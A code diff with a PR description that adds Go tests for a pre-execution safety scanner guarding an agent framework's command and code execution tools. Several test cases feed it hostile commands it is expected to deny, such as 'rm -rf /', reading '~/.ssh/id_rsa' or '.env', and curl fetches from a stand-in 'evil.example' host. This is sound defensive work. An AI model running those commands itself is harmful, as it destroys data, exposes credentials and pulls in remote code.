+	if err := os.WriteFile(badExt, []byte(`allowed_commands = []`), 0o600); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := LoadPolicy(badExt); err == nil {
+		t.Fatal("LoadPolicy unsupported extension error = nil")
 	}
 }
 
@@ -298,6 +357,80 @@ func TestPermissionPolicyMapsReviewToAsk(t *testing.T) {
 	}
 }
 
+func TestPermissionPolicyAllowsUnknownToolAndNilRequest(t *testing.T) {
+	policy := NewPermissionPolicy(DefaultPolicy())
+	decision, err := policy.CheckToolPermission(context.Background(), nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionAllow {
+		t.Fatalf("nil request action = %q, want allow", decision.Action)
+	}
+
+	decision, err = policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "unknown_tool",
+		Arguments: []byte(`{}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionAllow {
+		t.Fatalf("unknown tool action = %q, want allow", decision.Action)
+	}
+}
+
+func TestPermissionPolicyInvalidArgsDeny(t *testing.T) {
+	policy := NewPermissionPolicy(DefaultPolicy())
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: []byte(`{`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionDeny ||
+		!strings.Contains(decision.Reason, "invalid args") {
+		t.Fatalf("unexpected decision: %+v", decision)
+	}
+}
+
+func TestPermissionPolicyAuditPath(t *testing.T) {
+	path := filepath.Join(t.TempDir(), "audit.jsonl")
+	policy := NewPermissionPolicy(DefaultPolicy(), WithAuditPath(path))
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: []byte(`{"command":"cat .env"}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionDeny {
+		t.Fatalf("action = %q, want deny", decision.Action)
+	}
+	b, err := os.ReadFile(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	var event AuditEvent
+	if err := json.Unmarshal(bytes.TrimSpace(b), &event); err != nil {
+		t.Fatalf("audit file was not json: %v\n%s", err, string(b))
+	}
+	if event.RuleID != "sensitive.path_access" {
+		t.Fatalf("unexpected audit event: %+v", event)
+	}
+}
+
+func TestPermissionPolicyAuditWriterError(t *testing.T) {
+	policy := NewPermissionPolicy(DefaultPolicy(), WithAuditWriter(errorWriter{}))
+	_, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: []byte(`{"command":"go test ./..."}`),
+	})
+	if err == nil {
+		t.Fatal("CheckToolPermission audit writer error = nil")
+	}
+}
+
 func TestNilPermissionPolicyFailsClosed(t *testing.T) {
 	var policy *PermissionPolicy
 	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
@@ -326,6 +459,73 @@ func TestPermissionPolicyAllowsNullCodeBlocksNoop(t *testing.T) {
 	}
 }
 
+func TestRequestFromPermissionRequestParsesExecMetadata(t *testing.T) {
+	pty := true
+	req, ok, err := RequestFromPermissionRequest(&tool.PermissionRequest{
+		ToolName: "exec_command",
+		Arguments: []byte(`{
+			"command":"go test ./...",
+			"workdir":"/tmp/work",
+			"env":{"PATH":"/bin"},
+			"background":true,
+			"timeoutSec":12
+		}`),
+		Metadata: tool.ToolMetadata{Destructive: true},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	req.TTY = boolValue(&pty)
+	if !ok || req.Backend != BackendHostExec || req.Cwd != "/tmp/work" ||
+		req.TimeoutSeconds != 12 || !req.Background ||
+		!req.Metadata.Destructive || req.Env["PATH"] != "/bin" {
+		t.Fatalf("unexpected request: %+v", req)
+	}
+}
+
+func TestRequestFromPermissionRequestUsesDeclarationName(t *testing.T) {
+	req, ok, err := RequestFromPermissionRequest(&tool.PermissionRequest{
+		Declaration: &tool.Declaration{Name: "workspace_exec"},
+		Arguments:   []byte(`{"command":"go test ./...","cwd":"."}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !ok || req.ToolName != "workspace_exec" || req.Command != "go test ./..." ||
+		req.Cwd != "." || req.Backend != BackendWorkspaceExec {
+		t.Fatalf("unexpected request: %+v ok=%v", req, ok)
+	}
+}
+
+func TestParseCodeBlocksVariants(t *testing.T) {
+	blocks, err := parseCodeBlocks(json.RawMessage(`{"language":"python","code":"print(1)"}`))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(blocks) != 1 || blocks[0].Language != "python" {
+		t.Fatalf("unexpected object blocks: %+v", blocks)
+	}
+
+	inner := `[{"language":"bash","code":"echo ok"}]`
+	blocks, err = parseCodeBlocks(json.RawMessage(strconvQuote(inner)))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(blocks) != 1 || blocks[0].Language != "bash" {
+		t.Fatalf("unexpected string blocks: %+v", blocks)
+	}
+
+	if _, err := parseCodeBlocks(json.RawMessage(`"not-json"`)); err == nil {
+		t.Fatal("parseCodeBlocks invalid string error = nil")
+	}
+	if _, err := parseCodeBlocks(json.RawMessage(`42`)); err == nil {
+		t.Fatal("parseCodeBlocks scalar error = nil")
+	}
+	if _, err := parseCodeBlocks(json.RawMessage(`[{"language":42}]`)); err == nil {
+		t.Fatal("parseCodeBlocks malformed array error = nil")
+	}
+}
+
 func TestScanRedactsSecrets(t *testing.T) {
 	report := Scan(Request{
 		ToolName: "workspace_exec",
@@ -344,6 +544,33 @@ func TestScanRedactsSecrets(t *testing.T) {
 	}
 }
 
+func TestScanMetadataEnvAndTelemetry(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "go test ./...",
+		Metadata: ToolMetadata{Destructive: true},
+		Env: map[string]string{
+			"PATH":    "/bin",
+			"BAD_ENV": "1",
+		},
+	}, DefaultPolicy())
+	if report.Decision != DecisionNeedsHumanReview ||
+		report.RuleID != "tool.metadata_destructive" {
+		t.Fatalf("unexpected report: %+v", report)
+	}
+	attrs := report.SpanAttributes()
+	if attrs["tool.safety.decision"] != string(report.Decision) ||
+		attrs["tool.safety.risk_level"] != string(report.RiskLevel) ||
+		attrs["tool.safety.rule_id"] != report.RuleID ||
+		attrs["tool.safety.backend"] != report.Backend {
+		t.Fatalf("unexpected span attrs: %+v", attrs)
+	}
+	if len(report.Findings) < 2 {
+		t.Fatalf("expected metadata and env findings: %+v", report.Findings)
+	}
+}
+
 func TestScanDeniedCWD(t *testing.T) {
 	report := Scan(Request{
 		ToolName: "workspace_exec",
@@ -353,6 +580,102 @@ func TestScanDeniedCWD(t *testing.T) {
 	}, DefaultPolicy())
 	if report.Decision != DecisionDeny || report.RuleID != "sensitive.cwd_access" {
 		t.Fatalf("unexpected report: %+v", report)
+	}
+}
+
+func TestScanDeniedRootPath(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "go test ./...",
+		Cwd:      "/",
+	}, DefaultPolicy())
+	if report.Decision != DecisionDeny || report.RuleID != "sensitive.cwd_access" {
+		t.Fatalf("root cwd should be denied: %+v", report)
+	}
+
+	report = Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "cat /",
+	}, DefaultPolicy())
+	if report.Decision != DecisionDeny || report.RuleID != "sensitive.path_access" {
+		t.Fatalf("root path argument should be denied: %+v", report)
+	}
+}
+
+func TestScanCodeExecAppliesRequestEnvelope(t *testing.T) {
+	tests := []struct {
+		name     string
+		req      Request
+		decision Decision
+		ruleID   string
+	}{
+		{
+			name: "denied cwd",
+			req: Request{
+				ToolName: "execute_code",
+				Backend:  BackendCodeExec,
+				Cwd:      "/",
+				CodeBlocks: []CodeBlock{{
+					Language: "python",
+					Code:     "print(1)",
+				}},
+			},
+			decision: DecisionDeny,
+			ruleID:   "sensitive.cwd_access",
+		},
+		{
+			name: "timeout exceeded",
+			req: Request{
+				ToolName:       "execute_code",
+				Backend:        BackendCodeExec,
+				TimeoutSeconds: DefaultPolicy().MaxTimeoutSeconds + 1,
+				CodeBlocks: []CodeBlock{{
+					Language: "python",
+					Code:     "print(1)",
+				}},
+			},
+			decision: DecisionDeny,
+			ruleID:   "resource.timeout_exceeded",
+		},
+		{
+			name: "output exceeded",
+			req: Request{
+				ToolName:       "execute_code",
+				Backend:        BackendCodeExec,
+				MaxOutputBytes: DefaultPolicy().MaxOutputBytes + 1,
+				CodeBlocks: []CodeBlock{{
+					Language: "python",
+					Code:     "print(1)",
+				}},
+			},
+			decision: DecisionDeny,
+			ruleID:   "resource.output_limit_exceeded",
+		},
+		{
+			name: "background",
+			req: Request{
+				ToolName:   "execute_code",
+				Backend:    BackendCodeExec,
+				Background: true,
+				CodeBlocks: []CodeBlock{{
+					Language: "python",
+					Code:     "print(1)",
+				}},
+			},
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "process.background",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			report := Scan(tt.req, DefaultPolicy())
+			if report.Decision != tt.decision || report.RuleID != tt.ruleID {
+				t.Fatalf("unexpected report: %+v", report)
+			}
+		})
 	}
 }
 
@@ -386,4 +709,51 @@ func TestScanFiveHundredCommandsUnderOneSecond(t *testing.T) {
 	if report.Decision != DecisionAllow {
 		t.Fatalf("unexpected report: %+v", report)
 	}
+}
+
+func TestWriteAuditJSONLWritesOneRecord(t *testing.T) {
+	var w countingWriter
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "go test ./...",
+	}, DefaultPolicy())
+	if err := WriteAuditJSONL(&w, report); err != nil {
+		t.Fatal(err)
+	}
+	if w.calls != 1 {
+		t.Fatalf("Write calls = %d, want 1", w.calls)
+	}
+	if !bytes.HasSuffix(w.data, []byte("\n")) {
+		t.Fatalf("audit record should end with newline: %q", w.data)
+	}
+	var event AuditEvent
+	if err := json.Unmarshal(bytes.TrimSpace(w.data), &event); err != nil {
+		t.Fatalf("audit record was not json: %v\n%s", err, string(w.data))
+	}
+	if event.Decision != DecisionAllow || event.ToolName != "workspace_exec" {
+		t.Fatalf("unexpected audit event: %+v", event)
+	}
+}
+
+type countingWriter struct {
+	calls int
+	data  []byte
+}
+
+type errorWriter struct{}
+
+func (errorWriter) Write([]byte) (int, error) {
+	return 0, errors.New("write failed")
+}
+
+func strconvQuote(s string) string {
+	b, _ := json.Marshal(s)
+	return string(b)
+}
+
+func (w *countingWriter) Write(p []byte) (int, error) {
+	w.calls++
+	w.data = append(w.data, p...)
+	return len(p), nil
 }

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -1,0 +1,336 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"bytes"
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+	"time"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool"
+)
+
+func TestScanRequiredSamples(t *testing.T) {
+	policy := DefaultPolicy()
+	tests := []struct {
+		name     string
+		req      Request
+		decision Decision
+		ruleID   string
+	}{
+		{
+			name: "safe go test",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "go test ./...",
+			},
+			decision: DecisionAllow,
+		},
+		{
+			name: "dangerous delete",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "rm -rf /",
+			},
+			decision: DecisionDeny,
+			ruleID:   "dangerous.rm_rf",
+		},
+		{
+			name: "read key",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "cat ~/.ssh/id_rsa",
+			},
+			decision: DecisionDeny,
+			ruleID:   "sensitive.path_access",
+		},
+		{
+			name: "non whitelist network",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "curl https://evil.example/install.sh",
+			},
+			decision: DecisionDeny,
+			ruleID:   "network.non_whitelisted_domain",
+		},
+		{
+			name: "whitelist network",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "curl https://api.github.com/repos/trpc-group/trpc-agent-go",
+			},
+			decision: DecisionAllow,
+		},
+		{
+			name: "shell wrapper bypass",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "bash -c 'curl https://evil.example/x'",
+			},
+			decision: DecisionDeny,
+			ruleID:   "shell.bypass",
+		},
+		{
+			name: "pipeline command",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "cat README.md | wc -l",
+			},
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "shell.pipeline_review",
+		},
+		{
+			name: "dependency install",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "npm install left-pad",
+			},
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "dependency.environment_change",
+		},
+		{
+			name: "long running sleep",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "sleep 9999",
+			},
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "resource.long_sleep",
+		},
+		{
+			name: "large output",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "yes x | head -c 9999999",
+			},
+			decision: DecisionDeny,
+			ruleID:   "resource.large_output",
+		},
+		{
+			name: "hostexec long session",
+			req: Request{
+				ToolName:   "exec_command",
+				Backend:    BackendHostExec,
+				Command:    "tail -f app.log",
+				TTY:        true,
+				Background: true,
+			},
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "hostexec.long_session",
+		},
+		{
+			name: "ask human review",
+			req: Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "python -c 'import subprocess; subprocess.run([\"go\", \"test\", \"./...\"])'",
+				CodeBlocks: []CodeBlock{{
+					Language: "python",
+					Code:     "import subprocess; subprocess.run(['go', 'test', './...'])",
+				}},
+			},
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "codeexec.host_command_bridge",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			report := Scan(tt.req, policy)
+			if report.Decision != tt.decision {
+				t.Fatalf("decision = %q, want %q; report: %+v",
+					report.Decision, tt.decision, report)
+			}
+			if tt.ruleID != "" && report.RuleID != tt.ruleID {
+				t.Fatalf("rule id = %q, want %q; report: %+v",
+					report.RuleID, tt.ruleID, report)
+			}
+			if err := ValidateReport(report); err != nil {
+				t.Fatalf("report missing required fields: %v", err)
+			}
+		})
+	}
+}
+
+func TestLoadPolicyChangesNetworkAllowlistWithoutCode(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "tool_safety_policy.yaml")
+	content := []byte(`
+network_allowlist:
+  - example.com
+denied_paths:
+  - .env
+`)
+	if err := os.WriteFile(path, content, 0o600); err != nil {
+		t.Fatal(err)
+	}
+	policy, err := LoadPolicy(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "curl https://example.com/file",
+	}, policy)
+	if report.Decision != DecisionAllow {
+		t.Fatalf("decision = %q, want allow; report: %+v", report.Decision, report)
+	}
+	report = Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "curl https://api.github.com/repos/x/y",
+	}, policy)
+	if report.Decision != DecisionDeny {
+		t.Fatalf("decision = %q, want deny; report: %+v", report.Decision, report)
+	}
+}
+
+func TestLoadPolicyCanDisablePipelineReview(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "tool_safety_policy.yaml")
+	content := []byte(`
+review_shell_pipelines: false
+allowed_commands:
+  - cat
+  - wc
+`)
+	if err := os.WriteFile(path, content, 0o600); err != nil {
+		t.Fatal(err)
+	}
+	policy, err := LoadPolicy(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "cat README.md | wc -l",
+	}, policy)
+	if report.Decision != DecisionAllow {
+		t.Fatalf("decision = %q, want allow; report: %+v", report.Decision, report)
+	}
+}
+
+func TestPermissionPolicyBlocksAndAudits(t *testing.T) {
+	args := []byte(`{"command":"cat .env","timeout_sec":10}`)
+	var audit bytes.Buffer
+	policy := NewPermissionPolicy(DefaultPolicy(), WithAuditWriter(&audit))
+	decision, err := policy.CheckToolPermission(nil, &tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: args,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionDeny {
+		t.Fatalf("action = %q, want deny", decision.Action)
+	}
+	var event AuditEvent
+	if err := json.Unmarshal(bytes.TrimSpace(audit.Bytes()), &event); err != nil {
+		t.Fatalf("audit was not json: %v\n%s", err, audit.String())
+	}
+	if event.ToolName != "workspace_exec" ||
+		event.Decision != DecisionDeny ||
+		event.RuleID != "sensitive.path_access" ||
+		!event.Blocked {
+		t.Fatalf("unexpected audit event: %+v", event)
+	}
+}
+
+func TestPermissionPolicyMapsReviewToAsk(t *testing.T) {
+	args := []byte(`{"command":"npm install left-pad"}`)
+	policy := NewPermissionPolicy(DefaultPolicy())
+	decision, err := policy.CheckToolPermission(nil, &tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: args,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionAsk {
+		t.Fatalf("action = %q, want ask", decision.Action)
+	}
+}
+
+func TestScanRedactsSecrets(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "echo OPENAI_API_KEY=sk-1234567890abcdef",
+	}, DefaultPolicy())
+	if report.Decision != DecisionDeny {
+		t.Fatalf("decision = %q, want deny", report.Decision)
+	}
+	if !report.Redacted {
+		t.Fatalf("report should indicate redaction")
+	}
+	raw, _ := json.Marshal(report)
+	if bytes.Contains(raw, []byte("sk-1234567890abcdef")) {
+		t.Fatalf("report leaked secret: %s", raw)
+	}
+}
+
+func TestScanDeniedCWD(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "ls",
+		Cwd:      "~/.ssh",
+	}, DefaultPolicy())
+	if report.Decision != DecisionDeny || report.RuleID != "sensitive.cwd_access" {
+		t.Fatalf("unexpected report: %+v", report)
+	}
+}
+
+func TestScanHighConcurrencyNeedsReview(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "printf jobs | xargs -P 64 -n 1 echo",
+	}, DefaultPolicy())
+	if report.Decision != DecisionNeedsHumanReview ||
+		report.RuleID != "resource.high_concurrency" {
+		t.Fatalf("unexpected report: %+v", report)
+	}
+}
+
+func TestScanFiveHundredCommandsUnderOneSecond(t *testing.T) {
+	command := strings.Repeat("go test ./...\n", 500)
+	start := time.Now()
+	report := Scan(Request{
+		ToolName: "execute_code",
+		Backend:  BackendCodeExec,
+		CodeBlocks: []CodeBlock{{
+			Language: "python",
+			Code:     command,
+		}},
+	}, DefaultPolicy())
+	elapsed := time.Since(start)
+	if elapsed > time.Second {
+		t.Fatalf("scan took %s, want <= 1s", elapsed)
+	}
+	if report.Decision != DecisionAllow {
+		t.Fatalf("unexpected report: %+v", report)
+	}
+}


### PR DESCRIPTION
## What changed

- Added a configurable pre-execution safety scanner for command and code execution tools.
- Added YAML/JSON policy loading for allowed commands, denied commands, denied paths, network allowlists, timeout/output limits, and environment variable allowlists.
- Added safety scanning for dangerous commands, sensitive paths, non-whitelisted network targets, shell bypasses, host execution risks, dependency/environment changes, resource abuse, and secret leakage.
- Added a `tool.PermissionPolicy` wrapper for `workspace_exec`, hostexec `exec_command`, and `execute_code`.
- Added structured scan reports, JSONL audit events, secret redaction, and OpenTelemetry-ready safety attributes.
- Added `examples/tool_safety_guard` with sample policy, report, audit log, README, and required scan samples.

Fixes #2002

## Why

This provides a reusable pre-execution guard for command-like tools so high-risk tool calls can be denied or sent for human review before execution.

The guard complements sandbox isolation, clean environments, timeouts, output limits, and artifact controls, but does not replace sandboxing.

## Testing

```bash
go test ./tool/safety ./tool ./internal/shellsafe ./tool/codeexec
cd examples && go test ./tool_safety_guard